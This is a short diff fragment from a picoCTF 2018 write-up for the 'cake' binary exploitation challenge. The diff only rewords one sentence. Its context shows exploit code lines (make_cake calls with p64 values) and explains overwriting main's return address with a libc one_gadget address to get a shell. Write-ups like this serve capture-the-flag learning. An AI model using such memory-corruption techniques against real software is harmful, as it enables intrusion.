ihscy/writeups/picoCTF-2018/binary/cake/README.md

 c11 = make_cake(shop, p64(0))
 ```

 We set the return address of the `main` function to the `one_gadget` address* in `libc`.
-Once we close the shop, we will get into the shell.
+Once we close the shop, we get into the shell.

 ```python
 c1 = make_cake(one_gadget, p64(main_return_address))